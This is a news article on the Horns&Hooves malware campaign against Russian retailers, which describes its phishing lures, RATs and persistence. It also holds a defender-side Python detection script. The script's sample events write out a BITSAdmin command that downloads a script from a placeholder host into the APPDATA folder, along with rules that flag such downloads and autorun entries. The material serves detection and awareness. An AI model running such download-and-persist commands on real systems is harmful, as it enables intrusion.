Horns & Hooves Malware Campaign Affects More Than 1,000 Victims

Russian Cybercriminal Campaign Targets Retailers with Advanced Malware Tactics

A recent malware campaign has been launched against retailers and service providers in Russia, marking a significant upsurge in cybercriminal activity since March 2023. According to cybersecurity firm Kaspersky, this operation aims to infiltrate targeted organizations through sophisticated remote access tools and information-stealing malware.

The threat actor behind this campaign, identified as TA569 (also known as Mustard Tempest and Gold Prelude), relies on phishing to gain initial access. By sending emails that impersonate legitimate requests for quotes or proposals, the adversaries embed harmful scripts within ZIP file attachments. These scripts, typically delivered as JavaScript or HTML Application (HTA) files, are designed to bypass security measures and deploy malicious payloads upon execution.

Kaspersky has branded this operation the "Horns&Hooves" campaign, referencing a fictional organization from the 1931 Soviet satirical novel The Little Golden Calf. This name aptly reflects the con artistry employed by the attackers, who have successfully targeted over 1,000 victims in Russia. The attackers primarily deploy remote access trojans (RATs) such as NetSupport RAT and BurnsRAT through the compromised correspondence. The phishing emails are crafted to mimic genuine communication, using filenames like "Request for Price and Proposal" or "Letter of Claim" to bolster legitimacy.

Upon executing the malicious payloads, victims unwittingly install NetSupport Manager, which is weaponized to enable remote control by the attackers. This approach not only compromises the victim’s system but also provides a gateway for further exploitation, as the attackers can deploy additional information-gathering malware like Rhadamanthys and Meduza.

In the campaign’s early stages, attackers employed HTA scripts that fetched decoy files alongside malicious components, cleverly distracting victims from the underlying threat. As the campaign evolved, newer variants incorporated JavaScript files that utilized intermediary scripts to download a range of additional malicious tools, enhancing their operational capabilities.

One incident of note involved the use of an HTML Application file that, when activated, fetched a decoy image while simultaneously executing a secondary script via the BITSAdmin tool. This script initiated the download of the NetSupport RAT, establishing communication with the attacker’s command-and-control server, thereby facilitating ongoing access to the compromised system.

The malware is strategically stored in inconspicuous directories such as %APPDATA%\VCRuntimeSync, ensuring persistence through autorun registry entries. BurnsRAT, a more sophisticated variant of the Remote Manipulator System, supports functionalities like remote desktop connections, command execution, and file transfers. It employs encryption methods, including the RC4 algorithm, to secure communications with command-and-control servers during data exfiltration.
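As an added defender-side illustration (not code from the Kaspersky report or from this article), the following Python runs the two detection checks the chain above suggests, a script host such as mshta.exe spawning a BITSAdmin download and a Run-key autorun entry pointing into %APPDATA%\VCRuntimeSync, over constructed Sysmon-style events; the event field names, file names, paths and URL are assumptions, not indicators from the report.

```python
import re

# Constructed sample telemetry in a Sysmon-like shape (field names assumed);
# paths, URL and file names are placeholders, not indicators from the report.
EVENTS = [
    {"type": "process", "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer j /download http://example.invalid/s.js %APPDATA%\VCRuntimeSync\s.js"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe", "cmdline": "bitsadmin /list"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "VCRuntimeSync", "data": r"%APPDATA%\VCRuntimeSync\runtime.exe"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "Updater", "data": r"C:\Program Files\Vendor\updater.exe"},
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}   # HTA / JS launchers
DOWNLOAD_TOOLS = {"bitsadmin.exe"}
# Match both the unexpanded variable and its usual expanded form.
SUSPECT_DIR = re.compile(r"(%APPDATA%|\\AppData\\Roaming)\\VCRuntimeSync\b", re.I)

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def check_process(ev):
    """Script host (HTA/JS) spawning bitsadmin to download a file, as in the chain above."""
    if (_basename(ev["parent"]) in SCRIPT_HOSTS
            and _basename(ev["image"]) in DOWNLOAD_TOOLS
            and "/download" in ev["cmdline"].lower()):
        return "script host spawned bitsadmin download"
    return None

def check_registry(ev):
    """Run-key autorun whose target lives under the VCRuntimeSync directory."""
    if ev["key"].lower().endswith(r"\currentversion\run") and SUSPECT_DIR.search(ev["data"]):
        return "autorun entry targets %APPDATA%\\VCRuntimeSync"
    return None

def triage(events):
    """Return (event type, reason) for every event matching either rule."""
    findings = []
    for ev in events:
        reason = check_process(ev) if ev["type"] == "process" else check_registry(ev)
        if reason:
            findings.append((ev["type"], reason))
    return findings

if __name__ == "__main__":
    for kind, reason in triage(EVENTS):
        print(f"[{kind}] {reason}")
```

Only the mshta-spawned download and the VCRuntimeSync autorun are flagged; the benign bitsadmin listing and the vendor updater entry pass.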

Given the tactical sophistication observed in this campaign, business owners should be acutely aware of the potential risks. The methods employed, aligning with MITRE ATT&CK techniques such as initial access through phishing emails, persistence via autorun entries, and privilege escalation through remote access tools, underscore the pressing need for enhanced cybersecurity measures. Proactive vigilance and robust security protocols are vital in defending against such evolving cyber threats.
